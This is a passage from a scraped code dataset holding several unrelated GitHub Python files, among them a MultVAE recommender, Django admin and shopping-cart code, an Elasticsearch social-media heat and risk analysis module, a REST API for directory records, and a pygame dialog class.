* self.update_count / self.total_anneal_steps)\n                else:\n                    self.anneal = self.anneal_cap\n\n                pred_matrix, kl_loss = self.forward(batch_matrix)\n\n                # cross_entropy\n                ce_loss = F.binary_cross_entropy_with_logits(pred_matrix, batch_matrix, reduction='none').sum(1).mean()\n                batch_loss = ce_loss + kl_loss * self.anneal\n                batch_loss.backward()\n                self.optimizer.step()\n\n                self.update_count += 1\n\n                epoch_loss += batch_loss\n\n                if exp_config.verbose and b % 50 == 0:\n                    print('(%3d / %3d) loss = %.4f' % (b, num_batches, batch_loss))\n            \n            epoch_summary = {'loss': epoch_loss}\n            \n            # Evaluate if necessary\n            if evaluator is not None and epoch >= exp_config.test_from and epoch % exp_config.test_step == 0:\n                scores = evaluator.evaluate(self)\n                epoch_summary.update(scores)\n                \n                if loggers is not None:\n                    for logger in loggers:\n                        logger.log_metrics(epoch_summary, epoch=epoch)\n                \n                ## Check early stop\n                if early_stop is not None:\n                    is_update, should_stop = early_stop.step(scores, epoch)\n                    if should_stop:\n                        break\n            else:\n                if loggers is not None:\n                    for logger in loggers:\n                        logger.log_metrics(epoch_summary, epoch=epoch)\n\n        best_score = early_stop.best_score if early_stop is not None else scores\n        return {'scores': best_score}\n\n    def predict(self, eval_users, eval_pos, test_batch_size):\n        with torch.no_grad():\n            input_matrix = torch.FloatTensor(eval_pos.toarray()).to(self.device)\n            preds = np.zeros(eval_pos.shape)\n\n            num_data = input_matrix.shape[0]\n            num_batches = int(np.ceil(num_data / test_batch_size))\n            perm = list(range(num_data))\n            for b in range(num_batches):\n                if (b + 1) * test_batch_size >= num_data:\n                    batch_idx = perm[b * test_batch_size:]\n                else:\n                    batch_idx = perm[b * test_batch_size: (b + 1) * test_batch_size]\n                test_batch_matrix = input_matrix[batch_idx]\n                batch_pred_matrix = self.forward(test_batch_matrix)\n                preds[batch_idx] = batch_pred_matrix.detach().cpu().numpy()\n            \n            preds[eval_pos.nonzero()] = float('-inf')\n\n            return preds","repo_name":"yoongi0428/RecSys_PyTorch","sub_path":"models/MultVAE.py","file_name":"MultVAE.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"76"} +{"seq_id":"1272132552","text":"from django.db import models as dbModels\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin as DjangoUserAdmin\nfrom django.utils.translation import ugettext_lazy as _\nfrom martor.widgets import AdminMartorWidget\nfrom tempus_dominus.widgets import DateTimePicker\n\nfrom .models import CustomUser, NewsModel, FaqModel, PuzzleInfo, Challenge, ChallengeFile, Metric, Submission, Score, \\\n    Group\n\nfrom django.apps import apps\n\n\nmodels = apps.get_models()\n\n\n@admin.register(CustomUser)\nclass UserAdmin(DjangoUserAdmin):\n    \"\"\"Define admin model for custom User model with no username field.\"\"\"\n\n    fieldsets = (\n        (None, {'fields': ('email', 'password', 'first_name', 'last_name', \"email_confirmed\", \"is_authorised\", \"is_disabled\")}),\n        # (_('Personal info'), {'fields': ('first_name', 'last_name')}),\n        (_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser',\n                                       'groups', 'user_permissions')}),\n        (_('Important dates'), {'fields': ('last_login', 'date_joined')}),\n    )\n    add_fieldsets = (\n        (None, {\n            'classes': ('wide',),\n            'fields': ('email', 'password1', 'password2'),\n        }),\n    )\n    list_display = ('email', 'first_name', 'last_name', 'is_staff', \"email_confirmed\", \"is_authorised\", \"is_disabled\")\n    search_fields = 
('email', 'first_name', 'last_name', \"email_confirmed\", \"is_authorised\", \"is_disabled\")\n ordering = ('email',)\n\n\nclass MarkdownModelAdmin(admin.ModelAdmin):\n formfield_overrides = {\n dbModels.TextField: {'widget': AdminMartorWidget},\n }\n\nadmin.site.register(NewsModel, MarkdownModelAdmin)\nadmin.site.register(FaqModel, MarkdownModelAdmin)\nadmin.site.register(PuzzleInfo)\nadmin.site.register(Challenge)\nadmin.site.register(ChallengeFile)\nadmin.site.register(Metric)\nadmin.site.register(Submission)\nadmin.site.register(Score)\nadmin.site.register(Group)\n","repo_name":"whinyadventure/RNA-Puzzles","sub_path":"RNAPuzzles/rnapuzzles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32879350172","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport json\r\nimport codecs\r\n\r\nfrom collections import defaultdict\r\nfrom collections import OrderedDict\r\nfrom elasticsearch import Elasticsearch\r\n\r\nfrom get_user_name_type_by_uid import get_name_and_type\r\n\r\n\r\n# global variables\r\ntime_slice = 21600 # 21600s = 6h, interval length for X axis 86400 = 1 day\r\nes = Elasticsearch(['219.224.134.226:9209'])\r\nparameter_for_heat_index = [0.2, 0.4, 0.4] # paras can be changed\r\nparameter_for_risk_index = [0.2, 0.4, 0.4]\r\ntimeout = 15\r\n\r\n\r\ndef initialization(event_name):\r\n '''\r\n get start timestamp and end timestamp\r\n used as global vars\r\n '''\r\n\r\n global start_timestamp\r\n global end_timestamp\r\n\r\n query_body = {\r\n \"size\": 0,\r\n \"query\": {\r\n \"filtered\": {\r\n \"filter\": {\r\n \"term\": {\r\n \"message_type\": 1\r\n }\r\n }\r\n }\r\n },\r\n \"aggregations\": {\r\n \"time_slice\": {\r\n \"histogram\": {\r\n \"field\": \"timestamp\",\r\n \"interval\": time_slice, # global var\r\n \"min_doc_count\": 0\r\n\r\n }\r\n }\r\n }\r\n }\r\n response = es.search(\r\n index = event_name,\r\n doc_type = \"text\",\r\n body = query_body,\r\n timeout = timeout)\r\n start_timestamp = response[\"aggregations\"][\"time_slice\"][\"buckets\"][0][\"key\"]\r\n end_timestamp = response[\"aggregations\"][\"time_slice\"][\"buckets\"][-1][\"key\"]\r\n\r\n\r\ndef heat_curve(event_name):\r\n\r\n # local vars\r\n field_name = \"message_type\"\r\n\r\n # get query results\r\n origin_response = query(event_name, field_name, 1)\r\n comment_response = query(event_name, field_name, 2)\r\n forward_response = query(event_name, field_name, 3)\r\n\r\n # get elements for X axis (in list)\r\n datetime_list = construct_X_axis(origin_response)\r\n\r\n # get statistical data for origin, comment & forward (in list)\r\n origin_count_list = count_in_each_interval(origin_response)\r\n comment_count_list = count_in_each_interval(comment_response)\r\n forward_count_list = count_in_each_interval(forward_response)\r\n\r\n # get heat index (in list)\r\n heat_index_list = calculate_heat_index(origin_count_list, comment_count_list,\r\n forward_count_list, parameter_for_heat_index)\r\n\r\n result_list_for_frontend = generate_heat_result_list(heat_index_list, origin_count_list,\r\n comment_count_list, forward_count_list)\r\n\r\n return heat_index_list, datetime_list, result_list_for_frontend\r\n\r\n\r\ndef emotion_curve(event_name):\r\n\r\n # local vars\r\n field_name = \"sentiment\"\r\n\r\n positive_response = query(event_name, field_name, 1)\r\n negative_response = query(event_name, field_name, 3)\r\n\r\n positive_count_list = 
count_in_each_interval(positive_response)\r\n    negative_count_list = count_in_each_interval(negative_response)\r\n\r\n    positive_percentage, negative_percentage, vertical_axis = \\\r\n        calculate_percentage(positive_count_list, negative_count_list)\r\n\r\n    result_list_for_frontend = generate_emotion_result_list(positive_percentage,\r\n                                                            negative_percentage, vertical_axis)\r\n\r\n    return negative_percentage, result_list_for_frontend\r\n\r\n\r\ndef risk_evolution_curve(event_name, heat_index_list, negative_percentage):\r\n\r\n    # get max sensitive value in each interval\r\n    query_body = {\r\n        \"size\": 0,\r\n        \"aggs\": {\r\n            \"time_slice\": {\r\n                \"histogram\": {\r\n                    \"field\": \"timestamp\",\r\n                    \"interval\": time_slice,\r\n                    \"min_doc_count\": 0,\r\n                    \"extended_bounds\": {\r\n                        \"min\": start_timestamp,\r\n                        \"max\": end_timestamp\r\n                    }\r\n                },\r\n                \"aggs\": {\r\n                    \"sensitive\": {\r\n                        \"avg\": {\r\n                            \"field\": \"sensitive\"\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n    response = es.search(\r\n        index = event_name,\r\n        doc_type = \"text\",\r\n        body = query_body,\r\n        timeout = timeout)\r\n\r\n    sensitive_value_list = get_sensitive_value(response)\r\n\r\n    risk_index_list = calculate_risk_index(heat_index_list, negative_percentage,\r\n                                           sensitive_value_list, parameter_for_risk_index)\r\n\r\n    result_list_for_frontend = generate_risk_result_list(risk_index_list, heat_index_list,\r\n                                                         negative_percentage, sensitive_value_list)\r\n\r\n    return result_list_for_frontend\r\n\r\n\r\ndef key_user_identification(event_name):\r\n\r\n    query_body = {\r\n        \"size\": 0,\r\n        \"query\": {\r\n            \"filtered\": {\r\n                \"filter\": {\r\n                    \"terms\": {\r\n                        \"message_type\": [2,3]\r\n                    }\r\n                }\r\n            }\r\n        },\r\n        \"aggs\": {\r\n            \"time_slice\": {\r\n                \"histogram\": {\r\n                    \"field\": \"timestamp\",\r\n                    \"interval\": time_slice,\r\n                    \"min_doc_count\": 0,\r\n                    \"extended_bounds\": {\r\n                        \"min\": start_timestamp,\r\n                        \"max\": end_timestamp\r\n                    }\r\n                },\r\n                \"aggs\": {\r\n                    \"key_users\": {\r\n                        \"terms\": {\r\n                            \"field\": \"root_uid\",\r\n                            \"size\": 10\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n    response = es.search(\r\n        index = event_name,\r\n        doc_type = \"text\",\r\n        body = query_body,\r\n        timeout = timeout)\r\n\r\n    vertical_axis_list, key_users_list = get_vertical_axis_and_key_users(response)\r\n\r\n    result_list_for_frontend = generate_key_users_result_list(vertical_axis_list, key_users_list)\r\n\r\n    return result_list_for_frontend\r\n\r\n\r\ndef risk_details(event_name):\r\n\r\n    query_body = { # return every mid within each 6-hour time slice\r\n        \"size\": 0,\r\n        \"query\": {\r\n            \"match_all\": {}\r\n        },\r\n        \"aggs\": {\r\n            \"time_slice\": {\r\n                \"histogram\": {\r\n                    \"field\": \"timestamp\",\r\n                    \"interval\": time_slice,\r\n                    \"min_doc_count\": 0,\r\n                    \"extended_bounds\": {\r\n                        \"min\": start_timestamp,\r\n                        \"max\": end_timestamp\r\n                    }\r\n                },\r\n                \"aggs\": {\r\n                    \"key_users\": {\r\n                        \"terms\": {\r\n                            \"field\": \"mid\",\r\n                            \"size\": 30\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n    response = es.search(\r\n        index = event_name,\r\n        doc_type = \"text\",\r\n        body = query_body,\r\n        timeout = timeout)\r\n\r\n    hot_post_list = get_hot_posts(event_name, response)\r\n\r\n    # for i in range(len(hot_post_list)):\r\n    #     print hot_post_list[i]\r\n\r\n    return hot_post_list\r\n\r\n\r\ndef query(event_name, field_name, value):\r\n\r\n    query_body = {\r\n        \"size\": 0,\r\n        \"query\": {\r\n            \"filtered\": {\r\n                \"filter\": {\r\n                    \"term\": {\r\n                        field_name: value\r\n                    }\r\n                }\r\n            }\r\n        },\r\n        \"aggregations\": {\r\n            \"time_slice\": {\r\n                \"histogram\": {\r\n                    \"field\": \"timestamp\",\r\n                    \"interval\": time_slice, # 
global var\r\n                    \"min_doc_count\": 0,\r\n                    \"extended_bounds\": {\r\n                        \"min\": start_timestamp,\r\n                        \"max\": end_timestamp\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n    response = es.search(\r\n        index = event_name,\r\n        doc_type = \"text\",\r\n        body = query_body,\r\n        timeout = timeout)\r\n\r\n    return response\r\n\r\n\r\ndef construct_X_axis(origin_response):\r\n    # comments and forwards always occur after the original post\r\n    x_axis = []\r\n    buckets = origin_response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n    for i in range(len(buckets)):\r\n        x_axis.append(timestamp_to_date(buckets[i][\"key\"]))\r\n\r\n    return x_axis\r\n\r\n\r\ndef timestamp_to_date(unix_time):\r\n    format = '%m/%d %H:%M'\r\n\r\n    value = time.localtime(unix_time)\r\n    date = time.strftime(format, value)\r\n\r\n    return date\r\n\r\n\r\ndef count_in_each_interval(response):\r\n    counts = []\r\n    buckets = response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n    for i in range(len(buckets)):\r\n        counts.append(buckets[i][\"doc_count\"])\r\n\r\n    return counts\r\n\r\n\r\ndef calculate_heat_index(origin_list, comment_list, forward_list, parameter_list):\r\n\r\n    heat_index = []\r\n    temp = []\r\n\r\n    for i in range(len(origin_list)):\r\n        index = round(parameter_list[0] * origin_list[i] + parameter_list[1] * comment_list[i] \\\r\n                      + parameter_list[2] * forward_list[i])\r\n        temp.append(index)\r\n\r\n    denominator = max(temp)\r\n\r\n    for i in range(len(origin_list)):\r\n        heat_index.append(int(round((temp[i] / denominator) * 100)))\r\n\r\n    return heat_index\r\n\r\n\r\ndef generate_heat_result_list(heat_list, origin_list, comment_list, forward_list):\r\n    result_list = []\r\n\r\n    for i in range(len(heat_list)):\r\n        d = {'heat': heat_list[i], 'origin': origin_list[i],\r\n             'comment': comment_list[i], 'forward': forward_list[i]}\r\n        result_list.append(d)\r\n\r\n    return result_list\r\n\r\n\r\ndef calculate_percentage(positive_list, negative_list):\r\n    vertical_axis = []\r\n    total = []\r\n    negative_percentage = []\r\n    positive_percentage = []\r\n\r\n    for i in range(len(positive_list)):\r\n        total.append(positive_list[i] + negative_list[i])\r\n\r\n    for i in range(len(positive_list)):\r\n        if negative_list[i] == 0 and positive_list[i] == 0:\r\n            vertical_axis.append(0)\r\n            positive_percentage.append(0)\r\n            negative_percentage.append(0)\r\n\r\n        elif negative_list[i] == 0 and positive_list[i] != 0:\r\n            vertical_axis.append(0)\r\n            positive_percentage.append(1)\r\n            negative_percentage.append(0)\r\n\r\n        elif negative_list[i] != 0 and positive_list[i] == 0:\r\n            vertical_axis.append(1)\r\n            positive_percentage.append(0)\r\n            negative_percentage.append(1)\r\n\r\n        else:\r\n            negative_percentage.append(round((float(negative_list[i]) / total[i]), 2))\r\n            positive_percentage.append(round((1 - negative_percentage[i]), 2))\r\n            vertical_axis.append(round((negative_percentage[i] / positive_percentage[i]), 2))\r\n\r\n    return positive_percentage, negative_percentage, vertical_axis\r\n\r\n\r\ndef generate_emotion_result_list(positive_percentage, negative_percentage, vertical_axis):\r\n    result_list = []\r\n\r\n    for i in range(len(positive_percentage)):\r\n        negative_percentage[i] = int(negative_percentage[i] * 100)\r\n\r\n    for i in range(len(positive_percentage)):\r\n        positive_percentage[i] = int(positive_percentage[i] * 100) # float to int\r\n\r\n    for i in range(len(positive_percentage)):\r\n        d = {'positive': positive_percentage[i], 'negative': negative_percentage[i],\r\n             'vertical_axis': vertical_axis[i]}\r\n        result_list.append(d)\r\n\r\n    return result_list\r\n\r\n\r\ndef 
get_sensitive_value(sensitive_response):\r\n    sensitive_value_list = []\r\n    buckets = sensitive_response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n    for i in range(len(buckets)):\r\n        if buckets[i][\"sensitive\"][\"value\"] != None:\r\n            sensitive_value_list.append(int(round(buckets[i][\"sensitive\"][\"value\"])))\r\n        else:\r\n            sensitive_value_list.append(0)\r\n\r\n    # map to 0-100\r\n    denominator = float(max(sensitive_value_list))\r\n    for i in range(len(buckets)):\r\n        sensitive_value_list[i] = int(round((sensitive_value_list[i] / denominator) * 100))\r\n\r\n    return sensitive_value_list\r\n\r\n\r\ndef calculate_risk_index(heat_list, emotion_list, sensitive_list, parameter_list):\r\n    '''\r\n    This function calculates risk index\r\n    :param heat_list: heat index, range 0-100\r\n    :param emotion_list: negative percent\r\n    :param sensitive_list: sensitive value, range 0-100\r\n    :return: risk index list, range 0-100\r\n    '''\r\n    temp = []\r\n    risk_index_list = []\r\n\r\n    for i in range(len(heat_list)):\r\n        temp.append(parameter_list[0] * heat_list[i] + parameter_list[1] * emotion_list[i]\r\n                    + parameter_list[2] * sensitive_list[i])\r\n\r\n    denominator = max(temp)\r\n\r\n    for i in range(len(heat_list)):\r\n        risk_index_list.append(int(round((temp[i] / denominator) * 100))) # map to 0-100\r\n\r\n    return risk_index_list\r\n\r\n\r\ndef generate_risk_result_list(risk, heat, emotion, sensitive):\r\n    result_list = []\r\n\r\n    for i in range(len(risk)):\r\n        d = {'risk_index': risk[i], 'heat_risk': heat[i],\r\n             'emotion_risk': emotion[i], 'sensitive_risk': sensitive[i]}\r\n        result_list.append(d)\r\n\r\n    return result_list\r\n\r\n\r\ndef get_vertical_axis_and_key_users(response):\r\n    # the vertical-axis value is the maximum comment/forward count within a time slice; the user it belongs to is the first entry in the key_users list\r\n    key_users = []\r\n    vertical_axis = []\r\n    buckets = response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n    for i in range(len(buckets)):\r\n        if buckets[i][\"key_users\"][\"buckets\"] == []:\r\n            vertical_axis.append(0)\r\n            key_users.append({\"key_users\": None})\r\n        else:\r\n            vertical_axis.append(buckets[i][\"key_users\"][\"buckets\"][0][\"doc_count\"])\r\n            d = {}\r\n            for j in range(len(buckets[i][\"key_users\"][\"buckets\"])):\r\n                d.setdefault(\"key_users\", [])\r\n                d[\"key_users\"].append(buckets[i][\"key_users\"][\"buckets\"][j][\"key\"])\r\n            key_users.append(d)\r\n\r\n    return vertical_axis, key_users\r\n\r\n\r\ndef generate_key_users_result_list(vertical_axis_list, key_users_list):\r\n    result_list = []\r\n\r\n    for i in range(len(vertical_axis_list)):\r\n        d = {'max_num_of_comment_and_forward': vertical_axis_list[i],\r\n             'key_users_list': key_users_list[i]}\r\n        result_list.append(d)\r\n\r\n    return result_list\r\n\r\n\r\ndef get_hot_posts(event_name, response):\r\n\r\n    result_list = []\r\n    buckets = response[\"aggregations\"][\"time_slice\"][\"buckets\"] # len = 137\r\n\r\n    for i in range(len(buckets)):\r\n\r\n        temp = []\r\n        for j in range(len(buckets[i][\"key_users\"][\"buckets\"])):\r\n            d = {}\r\n            num_of_comment = query_for_hot_posts(event_name, 2, buckets[i][\"key_users\"] \\\r\n                                                 [\"buckets\"][j][\"key\"], buckets[i][\"key\"])\r\n            num_of_forward = query_for_hot_posts(event_name, 3, buckets[i][\"key_users\"] \\\r\n                                                 [\"buckets\"][j][\"key\"], buckets[i][\"key\"])\r\n            total = num_of_comment + num_of_forward\r\n            mid = buckets[i][\"key_users\"][\"buckets\"][j][\"key\"]\r\n            d[\"mid\"] = mid\r\n            d[\"total\"] = total\r\n            d[\"comment\"] = num_of_comment\r\n            d[\"forward\"] = num_of_forward\r\n            d[\"timestamp\"] = buckets[i][\"key\"]\r\n            d[\"type\"] = event_name\r\n            
temp.append(d)\r\n        result_list.append(temp)\r\n\r\n    return result_list\r\n\r\n\r\ndef query_for_hot_posts(event_name, message_type, mid, start_timestamp):\r\n\r\n    query_body = {\r\n        \"query\": {\r\n            \"filtered\": {\r\n                \"filter\": {\r\n                    \"bool\": {\r\n                        \"must\": [\r\n                            {\r\n                                \"term\": {\r\n                                    \"message_type\": message_type\r\n                                }\r\n                            },\r\n                            {\r\n                                \"term\": {\r\n                                    \"root_mid\": mid\r\n                                }\r\n                            },\r\n                            {\r\n                                \"range\": {\r\n                                    \"timestamp\": {\r\n                                        \"gte\": start_timestamp,\r\n                                        \"lte\": start_timestamp + time_slice\r\n                                    }\r\n                                }\r\n                            }\r\n                        ]\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n    response = es.search(\r\n        index = event_name,\r\n        doc_type = \"text\",\r\n        body = query_body,\r\n        timeout = timeout)\r\n\r\n    return response[\"hits\"][\"total\"]\r\n\r\n\r\ndef generate_table_for_curve(event_name, datetime, heat_result, emotion_result, risk_result, key_users):\r\n\r\n    table_for_curve = []\r\n\r\n    for i in range(len(datetime)):\r\n        d = OrderedDict()\r\n        d[\"type\"] = event_name\r\n        d[\"datetime\"] = datetime[i]\r\n        d[\"heat_index\"] = heat_result[i][\"heat\"]\r\n        d[\"origin\"] = heat_result[i][\"origin\"]\r\n        d[\"comment\"] = heat_result[i][\"comment\"]\r\n        d[\"forward\"] = heat_result[i][\"forward\"]\r\n        d[\"proportion\"] = emotion_result[i][\"vertical_axis\"]\r\n        d[\"negative\"] = emotion_result[i][\"negative\"]\r\n        d[\"positive\"] = emotion_result[i][\"positive\"]\r\n        d[\"risk_index\"] = risk_result[i][\"risk_index\"]\r\n        d[\"heat_risk\"] = risk_result[i][\"heat_risk\"]\r\n        d[\"emotion_risk\"] = risk_result[i][\"emotion_risk\"]\r\n        d[\"sensitive_risk\"] = risk_result[i][\"sensitive_risk\"]\r\n        d[\"max_num_of_comment_and_forward\"] = key_users[i][\"max_num_of_comment_and_forward\"]\r\n        d[\"key_users\"] = key_users[i][\"key_users_list\"][\"key_users\"]\r\n        table_for_curve.append(d)\r\n\r\n    return table_for_curve\r\n\r\n\r\ndef processing_flow(event_name): # main function that invokes other functions\r\n\r\n    initialization(event_name)\r\n\r\n    heat_index_list, datetime_list, heat_result = heat_curve(event_name)\r\n    negative_percentage, emotion_result = emotion_curve(event_name)\r\n    risk_result = risk_evolution_curve(event_name, heat_index_list, negative_percentage)\r\n    key_user_result = key_user_identification(event_name) # the uid-to-identity mapping table is deferred for now; this module awaits an update\r\n\r\n    table_for_curve = generate_table_for_curve(event_name, datetime_list, heat_result,\r\n                                               emotion_result, risk_result, key_user_result)\r\n\r\n    hot_post_list = risk_details(event_name)\r\n\r\n    return table_for_curve, hot_post_list\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    processing_flow(\"flow_text_gangdu\")","repo_name":"Ymm0008/GroupCode","sub_path":"group/group_event/evolution_analysis/risk_evolution_processing_module.py","file_name":"risk_evolution_processing_module.py","file_ext":"py","file_size_in_byte":18912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12514215449","text":"from __future__ import unicode_literals\nimport logging\n\nfrom rest_framework import generics, serializers, response, status\n\nfrom dcl_server.backends.generic import update_dcl_record, clear_dcl_record\nfrom dcl_server.oasis.constants import OASIS_PREFIX_PARTYID\nfrom dcl_server.oasis.utils import get_hash\n\nlogger = logging.getLogger(__name__)\n\n\nclass UpdateDclRecordSerializer(serializers.Serializer):\n    capabilityPublisherUrl = serializers.CharField(required=True, max_length=1000)\n    participantIdentifier = serializers.CharField(required=True, max_length=1024)\n    participantIdentifierScheme = 
serializers.CharField(required=True, max_length=1024)\n\n def validate_participantIdentifierScheme(self, value): # NOQA\n if value != value.strip():\n raise serializers.ValidationError(\"You must not use trailing spaces in participant identifier scheme\")\n # The participant Identifier must meet the structural format\n # requirements of the identifier scheme.\n # The participant identifier scheme must be on the Council's list of\n # approved identifiers, as per the Policy on the use of business identifiers.\n if not value.startswith(OASIS_PREFIX_PARTYID):\n raise serializers.ValidationError(\"Unsupported scheme (ABN, GLN, DUNS and unregistered are supported)\")\n return value\n\n def validate(self, data):\n participant_id = None\n if 'participantIdentifier' in data and 'participantIdentifierScheme' in data:\n participant_id = \"{}::{}\".format(\n data['participantIdentifierScheme'],\n data['participantIdentifier']\n ).lower()\n if not participant_id:\n raise serializers.ValidationError(\"Can't determine ParticipantId to update\")\n data['participant_id'] = participant_id\n\n # user must have participant_id in his auth\n user_auth = getattr(self.context['request'], 'auth') or {}\n available_participant_ids = user_auth.get('participant_ids', [])\n if participant_id not in available_participant_ids:\n raise serializers.ValidationError(\n \"You don't have access to this ParticipantId\"\n )\n return data\n\n def save(self):\n new_value = self.validated_data['capabilityPublisherUrl']\n assert new_value\n\n logger.info(\n \"User %s with access based on %s tries to update record %s to value %s\",\n self.context['request'].user,\n self.validated_data.get('access_type'),\n self.validated_data.get('participant_id'),\n new_value\n )\n\n result = update_dcl_record(\n participant_id=self.validated_data['participant_id'],\n new_value=new_value,\n actor_party=self.validated_data.get('capabilityPublisherID'),\n actor_user=self.context['request'].user,\n )\n return result\n\n def get_response_data(self):\n return {\n \"hash\": \"b-{}\".format(get_hash(self.validated_data['participant_id']).lower())\n }\n\n\nclass UpdateDclRecordView(generics.CreateAPIView):\n \"\"\"\n Input format:\n {\n \"participantIdentifier\": \"51824753556\",\n \"participantIdentifierScheme\": \"urn:oasis:names:tc:ebcore:partyid-type:iso6523:0151\",\n \"capabilityPublisherUrl\": \"dcp.testpoint.io\"\n }\n \"\"\"\n\n def get_serializer_class(self):\n return UpdateDclRecordSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return response.Response(\n serializer.get_response_data(),\n status=status.HTTP_201_CREATED,\n headers=headers\n )\n\n\nclass DeleteDclRecordView(generics.DestroyAPIView):\n\n def destroy(self, request, *args, **kwargs):\n participant_id = kwargs.get('participant_id')\n user_auth = getattr(request, 'auth', {}) or {}\n available_participant_ids = user_auth.get('participant_ids', [])\n if participant_id not in available_participant_ids:\n raise serializers.ValidationError(\n \"You don't have access to this ParticipantId\"\n )\n\n result = clear_dcl_record(participant_id)\n if result is True:\n return response.Response(status=status.HTTP_204_NO_CONTENT)\n else:\n return response.Response(\n {\n \"errors\": [\n {\n \"code\": \"DCL-X400\",\n \"name\": \"Record Update Problem\",\n \"userMessage\": (\n \"It was impossible to delete 
such resource \"\n                                \"(due to access problems or non-existence)\"\n                            )\n                        }\n                    ]\n                },\n                status=status.HTTP_400_BAD_REQUEST,\n            )\n","repo_name":"test-point/testpoint-dcl","sub_path":"src-py/src/dcl_server/ausdigital_api_v0/views/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72304111287","text":"from ..database import names\nfrom .model import Model\n\n\nclass Zone(Model):\n    database_name = names.ZONES\n\n    def __init__(\n        self,\n        name=\"TCHAN\",\n        begin=None,\n        end=0\n    ):\n        super().__init__()\n        self.name = name\n        self.begin = begin\n        self.end = end + 1\n\n    @classmethod\n    def by_name(cls, name):\n        return cls(**cls.database().by_name(name))\n\n    @classmethod\n    def by_room_id(cls, room_id):\n        if room_id > 0:\n            return cls()\n        return cls(**cls.database().by_room_id(room_id))\n\n    def room_id(self, room_id):\n        return 0 if self.begin is None else (-room_id) - self.begin\n","repo_name":"d2emon/worlds","sub_path":"worlds-server/walk/models/zone.py","file_name":"zone.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36141852040","text":"\"\"\"Cart implementation.\"\"\"\n\nfrom decimal import Decimal\nfrom typing import Dict, List, Union\n\nfrom django.conf import settings\nfrom django.http.request import HttpRequest\n\nfrom store.models import Product\n\n\nclass Cart:\n    def __init__(self, request: HttpRequest) -> None:\n        \"\"\"Initialize the cart.\"\"\"\n        self.session = request.session\n        cart = self.session.get(settings.CART_SESSION_ID)\n        if not cart:\n            # save an empty cart in the session\n            cart = self.session[settings.CART_SESSION_ID] = {}\n        self.cart: Dict[str, Union[int, str, Product]] = cart\n\n    def __iter__(self):\n        \"\"\"Iterate over the items in the cart and fetch the products from the\n        database.\"\"\"\n\n        product_ids = self.cart.keys()\n        # fetch the product objects and add them to the cart\n        products = Product.objects.filter(id__in=product_ids)\n        cart = self.cart.copy()\n        for product in products:\n            cart[str(product.id)][\"product\"] = product\n        for item in cart.values():\n            item[\"price\"] = Decimal(item[\"price\"])\n            item[\"total_price\"] = item[\"price\"] * item[\"quantity\"]\n            yield item\n\n    def __len__(self) -> int:\n        \"\"\"Count the number of items in the cart.\"\"\"\n        return sum(item[\"quantity\"] for item in self.cart.values())\n\n    def add(\n        self, product: Product, quantity: int = 1, override_quantity: bool = False\n    ) -> None:\n        \"\"\"Add a product to the cart or update its quantity.\"\"\"\n        product_id = str(product.id)\n        if product_id not in self.cart:\n            self.cart[product_id] = {\n                \"quantity\": 0, \"price\": str(product.price)}\n        if override_quantity:\n            self.cart[product_id][\"quantity\"] = quantity\n        else:\n            self.cart[product_id][\"quantity\"] += quantity\n        self.save()\n\n    def save(self) -> None:\n        # mark the session as \"modified\" to make sure it gets saved\n        self.session.modified = True\n\n    def remove(self, product: Product) -> None:\n        \"\"\"Remove a product from the cart.\"\"\"\n        product_id = str(product.id)\n        if product_id in self.cart:\n            del self.cart[product_id]\n            self.save()\n\n    def clear(self) -> None:\n        # remove the cart from the session\n        del self.session[settings.CART_SESSION_ID]\n        self.save()\n\n    def get_total_price(self) -> Decimal:\n        return sum(\n            Decimal(item[\"price\"]) * item[\"quantity\"] for item in 
self.cart.values()\n )\n ","repo_name":"MikhailPrizba/Dyplom_project","sub_path":"farmer/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2493416689","text":"import pygame.font\n\nfrom button import Button\n\nclass Windows():\n def __init__(self,screen,msg1,msg2,msg3,left,top):\n self.screen = screen\n self.width, self.height = 200,200\n self.text_color = (255, 255, 255)\n self.bg_color = (20,40,150)\n self.font = pygame.font.SysFont(None, 60)\n self.rect = pygame.Rect(left,top,self.width, self.height)\n self.msg2_button = Button(screen, (170,300,160,40),text='Yes')\n self.msg3_button = Button(screen, (170,350,160,40),text='No')\n self.prep_msg(msg1)\n \n def prep_msg(self,msg1):\n self.msg_image = self.font.render(msg1, True, self.text_color,self.bg_color)\n \n def draw_windows(self):\n pygame.draw.rect(self.screen,self.bg_color,self.rect,0)\n self.screen.blit(self.msg_image, (170,220))\n self.msg2_button.draw_button()\n self.msg3_button.draw_button()\n","repo_name":"ssghlou/TicTacToe","sub_path":"windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19758875104","text":"def main():\n P = int(input())\n soma_meloes = 0\n 